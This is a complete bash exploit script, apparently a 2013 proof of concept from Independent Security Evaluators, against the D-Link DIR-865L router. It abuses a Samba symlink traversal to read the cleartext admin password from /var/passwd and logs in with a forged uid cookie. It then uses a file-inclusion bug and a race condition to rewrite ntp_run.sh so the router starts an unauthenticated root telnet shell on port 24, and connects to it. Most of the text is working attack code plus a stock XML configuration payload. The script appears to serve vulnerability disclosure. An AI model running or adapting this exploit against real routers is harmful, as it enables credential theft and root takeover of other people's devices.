#!/bin/bash
# D-Link DIR-865L Administrative Password and Root Shell Exploit
# Symlink Traversal - Discovered by Jacob Holcomb
# File Inclusion - Discovered by Jacob Thompson
# Race Condition - Discovered by Jacob Thompson
# Exploited by Jacob Thompson, Independent Security Evaluators
# June 11, 2013
#
# This script assumes that an NTFS-formatted drive is connected to
# the router, that password protection is not enabled on the Samba share,
# that the drive's name is as shown below, and that the router is at
# its default IP address of 192.168.0.1.
#
# Even if the Samba share is password protected, an attacker who knows
# the password can pass it to smbclient (e.g. -U 'user%password' instead
# of -N below) and the attack still works.
#
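# Name under which the router's Samba server exports the attached USB
# drive; it appears in the share URL and in the traversal path later on.
sharename="hp_v100w_00821"
set -euo pipefail

# Scratch directory for the files exchanged with the router (test.xml and
# the retrieved passwd file).  Created before the trap is installed so the
# handler can never run with an empty $tmpdir.
tmpdir="$(mktemp -d)"

# Remove the scratch directory on every exit path.  The race loop started
# later in this script runs as a background job; if the script aborts
# while it is running (set -e on a failed request) that job would keep
# hammering the router after we are gone, so reap every background job
# here as well.  Running twice (ERR, then EXIT) is harmless.
cleanup() {
  local job
  for job in $(jobs -p); do
    kill "$job" 2>/dev/null || true
  done
  cd /
  rm -rf -- "${tmpdir:?}"
}
trap cleanup EXIT ERR
cd "$tmpdir"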

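# Create test.xml, the file uploaded to the share and later pulled in via
# router_info.xml.  The <? ... ?> body is template code for the router's
# web server (the same PHP-like fwrite() dialect the D-Link CGIs use --
# inferred from how the file is executed below); when included it writes
# /var/run/ntp_run.sh so that the next run of that script starts telnetd
# on port 24 with /bin/sh as the login program, i.e. an unauthenticated
# shell with the privileges of the NTP runner (root, per the header).
# A plain here-document replaces ed(1), which is not installed by default
# on many systems; the quoted delimiter keeps the \n and the quotes
# literal, and the leading space on the fwrite line is preserved as-is.
cat > test.xml <<'EOF'
<?
 fwrite("w", "/var/run/ntp_run.sh", "#!/bin/sh\n/usr/sbin/telnetd -p 24 -l /bin/sh");
?>
EOF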

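# smbclient-rootlink is a patched smbclient with an extra "rootlink"
# command that creates a symbolic link pointing at / without any
# canonicalisation or other processing of the "/" path on the client
# side.  The router's Samba server follows that link (the symlink
# traversal bug), so once it exists the share also exposes the router's
# root filesystem under "root".  The patched binary is not part of this
# script; fail early with a clear message if it is missing.
command -v smbclient-rootlink >/dev/null 2>&1 \
  || { printf 'smbclient-rootlink not found in PATH\n' >&2; exit 1; }

# Upload test.xml, create the link and pull /var/passwd, which holds the
# admin password in clear text.  -N: no password prompt (the share is
# assumed to be unprotected; use -U 'user%pass' instead if it is not).
smbclient-rootlink "//192.168.0.1/$sharename" -N <<'EOF'
put test.xml
rootlink root
cd root
cd var
get passwd
EOF

# The admin password is the fourth double-quote-delimited field of the
# retrieved file (file format is not shown here; this mirrors the field
# the original cut extracted).  Refuse to continue with an empty password
# rather than logging in with it.
[[ -s passwd ]] \
  || { printf 'failed to retrieve /var/passwd from the router\n' >&2; exit 1; }
passwd="$(cut -d'"' -f4 < passwd)"
[[ -n "$passwd" ]] \
  || { printf 'could not parse the admin password out of passwd\n' >&2; exit 1; }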

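# Log in to the web UI with the recovered password.  Note that the script
# never reads a session cookie back from the router: it invents
# uid=0123456789 here and presents the same value on every authenticated
# request that follows, so the login is evidently bound to whatever uid
# the client supplies.  The password is URL-encoded (gluing it raw into
# the body breaks on '&', '%' or '+') and handed to curl on stdin rather
# than on the command line so it does not show up in `ps`.  The response
# is printed but not checked; the format of session.cgi's reply is not
# known here.
printf '%s' "$passwd" | curl \
  -H 'Cookie: uid=0123456789' \
  -d 'REPORT_METHOD=xml' -d 'ACTION=login_plaintext' -d 'USER=Admin' \
  --data-urlencode 'PASSWD@-' \
  -d 'CAPTCHA=' \
  http://192.168.0.1/session.cgi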

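# Start overwriting ntp_run.sh in a tight background loop.  router_info.xml
# includes the file named by ?section= without a traversal check (the file
# inclusion bug), so pointing it at the uploaded test.xml on the USB drive
# executes the template code, which rewrites /var/run/ntp_run.sh.  The
# service restart issued next regenerates and runs that script; the race
# is won if our version is on disk at the moment it is executed.
#  - The URL is quoted: '?' is a glob character and an unquoted URL can be
#    rewritten by the shell when a matching file exists.
#  - curl errors are ignored (|| :) because this subshell inherits set -e
#    from the script, and a single transient failure -- e.g. while the
#    router restarts the service -- would otherwise end the loop silently
#    and lose the race.
#  - Responses are discarded so the loop does not flood the terminal.
# The server apparently appends ".xml" itself: the uploaded file is
# test.xml but the request names "test".
while :; do
  curl -s -o /dev/null \
    "http://192.168.0.1/router_info.xml?section=../../tmp/storage/$sharename/test" || :
done &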

# Ask the router to restart its time service.  Restarting DEVICE.TIME is
# what causes /var/run/ntp_run.sh -- the file the background loop keeps
# overwriting -- to be executed, so this is the trigger for the race.
# Same client-chosen uid cookie as the login.
curl -H 'Cookie: uid=0123456789' \
  --data 'SERVICE=DEVICE.TIME' \
  --data 'ACTION=RESTART' \
  'http://192.168.0.1/service.cgi'

# Push a complete DEVICE.TIME configuration through hedwig.cgi, the
# configuration "set" endpoint.  The NTP section with <enable>1</enable>
# is presumably the part that matters for re-running the time service's
# start script; the RUNTIME.* modules and the timezone table look like
# the stock document the web UI itself posts and are sent unchanged.
# --data @- reads the XML from stdin (and, as --data always does, strips
# the newlines before sending).  The quoted delimiter keeps the document
# free of shell expansion.
curl -H 'Cookie: uid=0123456789' \
  -H 'Content-Type: text/xml; charset=utf-8' \
  --data @- \
  'http://192.168.0.1/hedwig.cgi' <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<postxml>
<module>
	<service>DEVICE.TIME</service>
	<device>
		<time>
			<ntp>
				<enable>1</enable>
				<period>604800</period>
				<server>ntp1.dlink.com</server>
			</ntp>
			<ntp6>
				<enable>1</enable>
				<period>604800</period>
			</ntp6>
			<timezone>61</timezone>
			<time/>
			<date/>
			<dst>0</dst>
			<dstmanual/>
			<dstoffset/>
		</time>
	</device>
</module>
<module>
	<service>RUNTIME.TIME</service>
	<runtime>
		<device>
			<date>01/01/2000</date>
			<time>01:13:49</time>
			<timestate>SUCCESS</timestate>
			<uptime>01/01/2000 01:13:49</uptime>
			<uptimes>4445</uptimes>
			<rfc1123time>Fri, 31 Dec 1999 17:13:49 GMT</rfc1123time>
			<ntp>
				<state>RUNNING</state>
				<server/>
				<uptime>12/31/1999 23:59:44</uptime>
				<uptimes/>
				<period/>
				<nexttime/>
				<nexttimes/>
			</ntp>
			<ntp6>
				<state>RUNNING</state>
				<server/>
				<uptime>12/31/1999 23:59:45</uptime>
				<uptimes/>
				<period/>
				<nexttime/>
				<nexttimes/>
			</ntp6>
			<timezone>
				<index>61</index>
				<name>(GMT+08:00) Taipei</name>
				<localename>(GMT+08:00) Taipei</localename>
				<dst>0</dst>
			</timezone>
		</device>
	</runtime>
	<ACTIVATE>ignore</ACTIVATE>
</module>
<module>
	<service>RUNTIME.SERVICES.TIMEZONE</service>	
	<runtime>
		<services>
			<timezone>												
						<valid>1</valid>
		<zone>
			<name>(GMT-12:00) International Date Line West</name>
			<gen>GMT+12:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT-11:00) Midway Island, Samoa</name>
			<gen>GMT+11:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT-10:00) Hawaii</name>
			<gen>GMT+10:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT-09:00) Alaska</name>
			<gen>GMT+09:00</gen>
			<dst>GDT,M4.1.0/02:00:00,M10.5.0/02:00:00</dst>
		</zone>
		<zone>
			<name>(GMT-08:00) Pacific Time (US & Canada); Tijuana</name>
			<gen>PST+08:00</gen>
			<dst>PDT,M4.1.0/02:00:00,M10.5.0/02:00:00</dst>
		</zone>
		<zone>
			<name>(GMT-07:00) Arizona</name>
			<gen>GMT+07:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT-07:00) Chihuahua, La Paz, Mazatlan</name>
			<gen>GMT+07:00</gen>
			<dst>GDT,M4.1.0/02:00:00,M10.5.0/02:00:00</dst>
		</zone>
		<zone>
			<name>(GMT-07:00) Mountain Time (US & Canada)</name>
			<gen>GMT+07:00</gen>
			<dst>GDT,M4.1.0/02:00:00,M10.5.0/02:00:00</dst>
		</zone>
		<zone>
			<name>(GMT-06:00) Central America</name>
			<gen>GMT+06:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT-06:00) Central Time (US & Canada)</name>
			<gen>GMT+06:00</gen>
			<dst>GDT,M4.1.0/02:00:00,M10.5.0/02:00:00</dst>
		</zone>
		<zone>
			<name>(GMT-06:00) Guadalajara, Mexico City, Monterrey</name>
			<gen>GMT+06:00</gen>
			<dst>GDT,M4.1.0/02:00:00,M10.5.0/02:00:00</dst>
		</zone>
		<zone>
			<name>(GMT-06:00) Saskatchewan</name>
			<gen>GMT+06:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT-05:00) Bogota, Lima, Quito,Indiana (East)</name>
			<gen>GMT+05:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT-05:00) Eastern Time (US & Canada)</name>
			<gen>EST+05:00</gen>
			<dst>EDT,M4.1.0/02:00:00,M10.5.0/02:00:00</dst>
		</zone>
		<zone>
			<name>(GMT-04:30) Caracas</name>
			<gen>GMT+04:30</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT-04:00) Georgetown, La Paz</name>
			<gen>GMT+04:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT-04:00) Atlantic Time (Canada)</name>
			<gen>GMT+04:00</gen>
			<dst>GDT,M4.1.0/02:00:00,M10.5.0/02:00:00</dst>
		</zone>
		<zone>
			<name>(GMT-04:00) Santiago</name>
			<gen>GMT+04:00</gen>
			<dst>GDT,M10.2.6/00:00:00,M3.2.6/00:00:00</dst>
		</zone>
		<zone>
			<name>(GMT-03:30) Newfoundland</name>
			<gen>GMT+03:30</gen>
			<dst>GDT,M4.1.0/02:00:00,M10.5.0/02:00:00</dst>
		</zone>
		<zone>
			<name>(GMT-03:00) Brasilia</name>
			<gen>GMT+03:00</gen>
			<dst>GDT,M11.1.0/00:00:00,M2.5.0/00:00:00</dst>
		</zone>
		<zone>
			<name>(GMT-03:00) Buenos Aires</name>
			<gen>GMT+03:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT-03:00) Greenland</name>
			<gen>GMT+03:00</gen>
			<dst>GDT,M4.1.0/02:00:00,M10.5.0/02:00:00</dst>
		</zone>
		<zone>
			<name>(GMT-02:00) Mid-Atlantic</name>
			<gen>GMT+02:00</gen>
			<dst>GDT,M3.5.0/02:00:00,M9.5.0/02:00:00</dst>
		</zone>
		<zone>
			<name>(GMT-01:00) Azores</name>
			<gen>GMT+01:00</gen>
			<dst>GDT,M3.5.0/02:00:00,M10.5.0/03:00:00</dst>
		</zone>
		<zone>
			<name>(GMT-01:00) Cape Verde Is.</name>
			<gen>GMT+01:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT) Casablanca, Monrovia</name>
			<gen>GMT+00:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT) Greenwich Mean Time : Dublin, Edinburgh, Lisbon, London</name>
			<gen>GMT+00:00</gen>
			<dst>GDT,M3.5.0/01:00:00,M10.5.0/02:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna</name>
			<gen>GMT-01:00</gen>
			<dst>GDT,M3.5.0/02:00:00,M10.5.0/03:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+01:00) Belgrade, Bratislava, Budapest, Ljubljana, Prague</name>
			<gen>GMT-01:00</gen>
			<dst>GDT,M3.5.0/02:00:00,M10.5.0/03:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+01:00) Brussels, Copenhagen, Madrid, Paris</name>
			<gen>GMT-01:00</gen>
			<dst>GDT,M3.5.0/02:00:00,M10.5.0/03:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+01:00) Sarajevo, Skopje, Warsaw, Zagreb</name>
			<gen>GMT-01:00</gen>
			<dst>GDT,M3.5.0/02:00:00,M10.5.0/03:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+01:00) West Central Africa</name>
			<gen>GMT-01:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+02:00) Athens, Istanbul, Minsk</name>
			<gen>GMT-02:00</gen>
			<dst>GDT,M3.5.0/03:00:00,M10.5.0/04:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+02:00) Bucharest</name>
			<gen>GMT-02:00</gen>
			<dst>GDT,M3.5.0/03:00:00,M10.5.0/04:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+02:00) Cairo</name>
			<gen>GMT-02:00</gen>
			<dst>GDT,M4.5.5/00:00:00,M9.5.4/00:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+02:00) Harare, Pretoria</name>
			<gen>GMT-02:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+02:00) Helsinki, Kyiv, Riga, Sofia, Tallinn, Vilnius</name>
			<gen>GMT-02:00</gen>
			<dst>GDT,M3.5.0/03:00:00,M10.5.0/04:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+02:00) Jerusalem</name>
			<gen>GMT-02:00</gen>
			<dst>GDT,M4.5.0/00:00:00,M10.5.0/01:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+03:00) Baghdad</name>
			<gen>GMT-03:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+03:00) Kuwait, Riyadh</name>
			<gen>GMT-03:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+03:00) Nairobi</name>
			<gen>GMT-03:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+03:30) Tehran</name>
			<gen>GMT-03:30</gen>
			<dst>GDT,M3.4.1/02:30:00,M10.4.3/03:30:00</dst>
		</zone>
		<zone>
			<name>(GMT+04:00) Abu Dhabi, Muscat</name>
			<gen>GMT-04:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+04:00) Baku, Tbilisi, Yerevan</name>
			<gen>GMT-04:00</gen>
			<dst>GDT,M3.5.0/02:00:00,M10.5.0/03:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+04:00) Moscow, St. Petersburg, Volgograd</name>
			<gen>GMT-04:00</gen>
			<dst>GDT,M3.5.0/02:00:00,M10.5.0/03:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+04:30) Kabul</name>
			<gen>GMT-04:30</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+06:00) Ekaterinburg</name>
			<gen>GMT-06:00</gen>
			<dst>GDT,M3.5.0/02:00:00,M10.5.0/03:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+05:00) Islamabad, Karachi, Tashkent</name>
			<gen>GMT-05:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+05:30) Chennai, Kolkata, Mumbai, New Delhi</name>
			<gen>GMT-05:30</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+05:45) Kathmandu</name>
			<gen>GMT-05:45</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+07:00) Almaty, Novosibirsk</name>
			<gen>GMT-07:00</gen>
			<dst>GDT,M3.5.0/02:00:00,M10.5.0/03:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+06:00) Astana, Dhaka</name>
			<gen>GMT-06:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+05:30) Sri Jayawardenepura</name>
			<gen>GMT-05:30</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+06:30) Rangoon</name>
			<gen>GMT-06:30</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+07:00) Bangkok, Hanoi, Jakarta</name>
			<gen>GMT-07:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+08:00) Krasnoyarsk</name>
			<gen>GMT-08:00</gen>
			<dst>GDT,M3.5.0/02:00:00,M10.5.0/03:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+08:00) Beijing, Chongqing, Hong Kong, Urumqi</name>
			<gen>CST-08:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+09:00) Irkutsk, Ulaan Bataar</name>
			<gen>GMT-09:00</gen>
			<dst>GDT,M3.5.0/02:00:00,M10.5.0/03:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+08:00) Kuala Lumpur, Singapore</name>
			<gen>GMT-08:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+08:00) Perth</name>
			<gen>GMT-08:00</gen>
			<dst>GDT,M10.5.0/02:00:00,M3.5.0/03:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+08:00) Taipei</name>
			<gen>GMT-08:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+09:00) Osaka, Sapporo, Tokyo</name>
			<gen>GMT-09:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+09:00) Seoul</name>
			<gen>GMT-09:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+10:00) Yakutsk</name>
			<gen>GMT-10:00</gen>
			<dst>GDT,M3.5.0/02:00:00,M10.5.0/03:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+09:30) Adelaide</name>
			<gen>GMT-09:30</gen>
			<dst>GDT,M10.5.0/02:00:00,M3.5.0/03:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+09:30) Darwin</name>
			<gen>GMT-09:30</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+10:00) Brisbane</name>
			<gen>GMT-10:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+10:00) Canberra, Melbourne, Sydney</name>
			<gen>GMT-10:00</gen>
			<dst>GDT,M10.5.0/02:00:00,M3.5.0/03:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+10:00) Guam, Port Moresby</name>
			<gen>GMT-10:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+10:00) Hobart</name>
			<gen>GMT-10:00</gen>
			<dst>GDT,M10.1.0/02:00:00,M3.5.0/03:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+11:00) Vladivostok</name>
			<gen>GMT-11:00</gen>
			<dst>GDT,M3.5.0/02:00:00,M10.5.0/03:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+12:00) Magadan, Solomon Is., New Caledonia</name>
			<gen>GMT-12:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+12:00) Auckland, Wellington</name>
			<gen>GMT-12:00</gen>
			<dst>GDT,M10.1.0/02:00:00,M3.5.0/03:00:00</dst>
		</zone>
		<zone>
			<name>(GMT+12:00) Fiji, Kamchatka, Marshall Is.</name>
			<gen>GMT-12:00</gen>
			<dst/>
		</zone>
		<zone>
			<name>(GMT+13:00) Nuku'alofa</name>
			<gen>GMT-13:00</gen>
			<dst/>
		</zone>

			</timezone>
		</services>
	</runtime>
	<SETCFG>ignore</SETCFG>
	<FATLADY>ignore</FATLADY>
	<ACTIVATE>ignore</ACTIVATE>			
</module>
</postxml>
EOF

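# Commit and activate the configuration pushed above.  curl exit status 52
# (CURLE_GOT_NOTHING, "empty reply from server") is tolerated silently: the
# router appears to drop the connection while it applies the new
# configuration.  Note that `|| echo [ $? == 52 ]` would not test anything
# -- echo just prints the literal string "[ 52 == 52 ]" -- so the status is
# captured and compared explicitly here.  Other failures are reported on
# stderr but do not abort: the race may already have been won, so the
# telnet attempt below is still worthwhile.
rv=0
curl \
  -H 'Cookie: uid=0123456789' \
  -d 'ACTIONS=SETCFG%2CSAVE%2CACTIVATE' \
  http://192.168.0.1/pigwidgeon.cgi || rv=$?
if (( rv != 0 && rv != 52 )); then
  printf 'warning: pigwidgeon.cgi request failed (curl exit %d); continuing\n' "$rv" >&2
fi

# Give the restarted time service a moment to execute ntp_run.sh.
sleep 5

# Stop the race loop (the most recent background job).  If it has already
# gone away there is nothing to kill; still try to connect.
kill % 2>/dev/null || true

# exec replaces this shell, so the EXIT/ERR trap would never fire:
# disarm it and clean up the scratch directory by hand first.
trap - 0 ERR
cd /
rm -rf -- "${tmpdir:?}"

exec telnet 192.168.0.1 24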